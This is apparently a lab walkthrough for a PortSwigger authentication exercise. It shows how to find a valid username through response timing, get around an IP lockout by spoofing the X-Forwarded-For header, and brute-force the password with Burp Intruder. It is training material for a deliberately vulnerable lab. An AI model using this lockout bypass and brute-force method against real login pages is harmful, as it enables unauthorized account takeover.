Username enumeration via response timing
To access the lab visit the following link:
This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Your credentials:
wiener:peter - Candidate usernames
- Candidate passwords
Click on the given button to access the lab
On the Lab’s homepage we can see “My account” option. Let’s click on that to attempt login.
Let’s login using any fake credentials to capture the login request using burp. In this case I used “test” as username and password.
As soon as we login we can see the POST request in burp HTTP history. Right click and send that request to repeater
In the Repeater tab, we sent the request three times consecutively. The response then changed to: “You have made too many incorrect login attempts. Please try again in 30 minute(s).”
Let’s add x-forwarded-for: 1 in header
The X-Forwarded-For header is a standard HTTP header used to identify the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer.
When you add x-forwarded-for: 1 to the header, it indicates that the original client's IP address is 1. However, the IP address 1 is not valid for real-world scenarios as it is not a complete IP address. Typically, this header would include a valid IP address, such as 203.0.113.195, which represents the client's real IP address.
Add x-forwarded-for: 1 to the header and send request again with the same username and password, we can see that by changing originating ip address we are able to send login request with the same username and password for another 3 times.
This response indicates that the application has an account lockout mechanism in place to prevent brute force attacks. When too many incorrect login attempts are made in a short period, the system temporarily locks the account, requiring the user to wait before trying again.
We know the credentials of wiener so let’s check response time for correct username and wrong password. Change username to wiener in repeater tab and send the request again.
We can see that the app takes longer than usual to respond back which means it is taking more time in computation at back end. The username was correct so we can assume that the app is taking time in checking password.
Response time can be seen at the bottom right of burp suite window.
Now, let’s send request with a incorrect username and incorrect password.
When we use an incorrect username with an incorrect long password, the application responds very quickly. This indicates that the application checks the validity of the username first and does not proceed to verify the password if the username is incorrect, resulting in a shorter response time.
Now, to brute force username let’s send this request to intruder. For that just right click and select “send to intruder”.
In intruder position tab select Attack type to pitchfork. The Pitchfork attack type in Burp Suite’s Intruder tool is a versatile method for testing combinations of multiple payload sets against a target. Pitchfork uses multiple payload sets simultaneously, aligning each payload position with a corresponding payload set. In this case Pitchfork will be helpful in changing value of x-forwarded-for: parameter each time with a payload so we won’t be facing account lock after every 3 requests.
Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the x-forwarded-for:parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
Highlight the value of the usernameparameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
Navigate to the “Payloads” tab in Intruder. you can see the Payload tab in the intruder section as shown below.
In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked.
Under “Payload Options”, select “Numbers”.
Add numbers from 0 to 100 (as we have list of only 100 usernames) and set step value to 1.
x-forwarded-for headerWe had the username list provided by portswigger.
In the “Payload Sets” section, select “Payload set 2” for usernames.
Under “Payload Options”, select “Simple list”.
Copy the list of usernames provided on the lab page and and click paste in the payload settings.
Now that we have set all the payloads click on “start attack” button.
Burp Suite will start sending requests with each username in our list with a different value of x-forwarded-for header and display the results in the Intruder tab.
We can now arrange request depending upon response received by clicking on the response received column. One of the requests have higher value of response receive time than others. This could be the right username as we have seen before that when username is correct the request takes much longer time to verify password at back end.
Let’s use this username and brute force password with the provided list. Let’s get back to the intruder tab.
Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the x-forwarded-for: parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
Highlight the value of the password parameter and click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
Navigate to the “Payloads” tab in Intruder.
In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked.
Under “Payload Options”, select “Numbers”.
Add numbers from 306 to 406 (as we have list of only 100 passwords) and set step value to 1. We are selecting different values for header this time because we don’t want to face account lock during attack.
We had the password list provided by portswigger.
In the “Payload Sets” select “Payload set 2” for password payload position you marked.
Under “Payload Options”, select “Simple list”.
Copy the list of passwords provided on the lab page and and click paste in the payload settings.
Now that we have set all the payloads click on “start attack” button.
Burp Suite will start sending requests with each password in our list and display the results in the Intruder tab.
To filter the results based on unique status code we can click on status code column. We can see that we have received 302 status code for one of the passwords sent and this could be our desired password.
Let’s get back to our login page and try to login with the username and password we identified.
And we are successfully logged in. The lab is also marked as solved.
Congratulations! The walkthrough of fifth authentication lab finishes here.
You can see walkthrough of Sixth lab by clicking the following link:
